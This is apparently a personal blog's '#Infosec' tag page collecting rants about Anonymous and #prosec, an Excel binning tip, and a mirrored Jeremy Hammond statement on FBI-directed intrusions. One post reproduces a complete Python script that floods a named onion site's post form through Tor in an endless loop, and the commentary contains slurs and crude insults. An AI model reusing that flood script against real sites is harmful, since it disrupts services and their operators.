Posts for: #Infosec

Information Wars

I saw you casually glancing at me while tweeting on your MacBook Air, sipping slightly on your venti horchatté. You’re judging me for my shitty laptop running crunchbang, my disheveled appearance, and the fact that I’m drinking plain coffee. You’re elite. You’re a part of the hacktivist collective known as “Anonymous”. Or you’re part of the penetration testers who narc on anons because you believe they dilute infosec with garbage.


Ping / Cheap Histograms

Living. That’s what I’ve been busy with. But I think I’m going to share a tidbit of knowledge to the poor kids out there who either aren’t smart enough to pirate a copy of Minitab or aren’t fortunate enough to drop $1500 on statistical analysis software. I’m going to show you how to do binning with Excel (and potentially LibreOffice / OpenOffice).

Excel binning is the easiest. It’s also a great deal more flexible than Minitab.


Hacks by Hammond

I figured I’d mirror this, just in case. It’s already out there, so the powers that be can’t expect to be able to suppress it.

Sabu also supplied lists of targets that were vulnerable to "zero day
exploits" used to break into systems, including a powerful remote root
vulnerability affecting the popular Plesk software. At his request,
these websites were broken into, their emails and databases were
uploaded to Sabu's FBI server, and the password information and the
location of root backdoors were supplied. These intrusions took place
in January/February of 2012 and affected over 2000 domains, including
numerous foreign government websites in Brazil, Turkey, Syria, Puerto
Rico, Colombia, Nigeria, Iran, Slovenia, Greece, Pakistan, and others.
A few of the compromised websites that I recollect include the
official website of the Governor of Puerto Rico, the Internal Affairs
Division of the Military Police of Brazil, the Official Website of the
Crown Prince of Kuwait, the Tax Department of Turkey, the Iranian
Academic Center for Education and Cultural Research, the Polish
Embassy in the UK, and the Ministry of Electricity of Iraq.

Sabu also infiltrated a group of hackers that had access to hundreds
of Syrian systems including government institutions, banks, and ISPs.
He logged several relevant IRC channels persistently asking for live
access to mail systems and bank transfer details. The FBI took
advantage of hackers who wanted to help support the Syrian people
against the Assad regime, who instead unwittingly provided the U.S.
government access to Syrian systems, undoubtedly supplying useful
intelligence to the military and their buildup for war.

All of this happened under the control and supervision of the FBI and
can be easily confirmed by chat logs the government provided to us
pursuant to the government's discovery obligations in the case against
me. However, the full extent of the FBI's abuses remains hidden.
Because I pled guilty, I do not have access to many documents that
might have been provided to me in advance of trial, such as Sabu's
communications with the FBI. In addition, the majority of the
documents provided to me are under a "protective order" which
insulates this material from public scrutiny. As government
transparency is an issue at the heart of my case, I ask that this
evidence be made public. I believe the documents will show that the
government's actions go way beyond catching hackers and stopping
computer crimes.

Jeremy Hammond

Trollercaust: Save the Celebrations

Sleepless, tired, sleepless, tired. I think I’ve managed to smash those words together rather well with my currently screwed up schedule. Alternating between the two is making me rather… Irritable. I’m unable to make good use of the time I’m capable of finding, mostly because I’m too exhausted just as soon as it floats my way.

Blogging aids and abets what little sanity that’s able to manage the minefield that is my brain. Cognition beyond the simplest thoughts- No, rarely may I ascend beyond my own plane. Instead, I’m forced to watch all manner of pig smash words together in faux-English and pretend he’s a higher order animal. Twitter is the favorite, these days, of such swine. Trolls, they like to call themselves. They pretend they know things about social engineering. Condemning works does not equate to engineering. Engineering requires thought, requires building things. Not burning bridges. Yet these condescending assholes burn bridges, taunt, provoke, and when all else fails they flail their arms and scream loudly, “Victim! I’m being victimized! People are harassing me and my children!” No.


Back Burner

I’ve watched “#prosec” and “Anonymous”, and all the douchebags in between, from a distance. It’s hilarious. Having formerly kept up to date with these people, I can tell you that it’s entirely similar watching from afar as it is being involved with communication. It’s all drama. Relentless, redundant, retarded drama. “OMG YOU PICKED A FIGHT WITH SOMEONE I LIKE SO I’M GONNA HACK EVERY MACHINE YOU HAVE BECAUSE I DONT LIEK U”. It’s kindergarten, sans kindergarten teacher. The breakdown is just as hilarious.


#Prosec Attacks on Doxbin

Looks like #prosec is nerdraging on @doxbin. The effects can be seen here. The attack I noticed first was a semi-lame HTTP POST attack that floods doxbin with garbage “dox”. Code here:

#!/usr/bin/python

import socks
#google it, it's a common python extension
import socket
#127.0.0.1:9050 is the default TOR socks4 proxy
#this connects to TOR
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, "127.0.0.1", 9050)
socket.socket = socks.socksocket
from httplib import *
from urllib import *
import random
import time
import hashlib

times = 1
while 1:
	############DOX############
	doxrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	dox = hashlib.sha224(doxrand).hexdigest()
	print dox
	#doxrand = picking a random character
	#dox = SHA hashing of the random character defined in doxrand
	##############NAEM###########
	naemrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	naem = hashlib.sha224(naemrand).hexdigest()
	print naem
	#same as above
	##############

	connection = HTTPConnection("doxbinumfxfyytnh.onion")
	#establishing HTTP connection to website
	head = {"Content-Type" : "application/x-www-form-urlencoded", "Accept" : "text/plain"}
	#constructing the header, so the webserver will respond properly
	parameters = urlencode({"naem" : naem, "dox" : dox})
	#defining the data to be used during POST, note naem and dox refer to the random strings from earlier
	#they must correspond to the ID fields from the web form, otherwise..it won't work
	connection.request("POST", "/post.php", parameters, head)
	#pushing the data to the post function of the php file
	print 'Connection OK...Continuing..'
	print 'Spammed', 
	print times, 
	print 'times!'
	times = times + 1
	time.sleep(30) #in seconds
	#self explanatory

Now, however, it looks like there are 403 Forbidden errors. I’m thinking Nachash will get things running again soon.


Musings on Information Security

I’ve been thinking a lot lately about the “PsyOPS” and “InfoSec” professionals that are wildly chasing hackers all over the internet. People claim they’re so elite because they’re infiltrating A GROUP THAT ANYONE CAN JOIN, REGARDLESS OF RACE, CREED, OR RELIGION. I guess it’s tacitly not infiltration, as I’m sure some of the “legit” members don’t have the group’s best interest at heart, for various reasons. So if you’re claiming to be “Destroyer of Anonymous”, you fail at life. You’re a fucking loser- an asshat. The reality is that Anonymous is destroying itself. It swells and declines. It will always eliminate parts of itself. Kind of like pruning. No group with such radical and diverse beliefs can remain cohesive. However, all “#prosec” douchebags are typically Republican, Bradley Manning hating government suckups who shit on the first amendment and would love to see all Arab Americans die. These are not generalizations- these fucking nutbags still have sore tits over 9/11. At least, the “twitter vocal” ones are that way. It’s ironic. If you want to gain support for your cause of “hating Anonymous”, wouldn’t you be nicer than a nazi? My guess is “mudsplatter / hubris” is still on the #prosec side of the fence, hunting Anonymous down with PsyOPS and trolling. However, he’s playing good cop at the moment. The minds at Backtrace Security likely discovered that being raging douches from all angles doesn’t get you very far. So riding high on the crest of “namshub.pdf” and the fact that all their dox came from the fallout just before HBGary, they’re trying like Hell to prove they’re actually worth something to the internet, and not just screaming trolls.


Thanks!

Loot!

Thanks, Anonymous Benefactor! Got the package today, you crazy bastard. The shirt is quite suitable. At least this way people don’t even have to check my blog to determine that I’m an Infosec Troll.

I owe you one.

- Red Gingerface
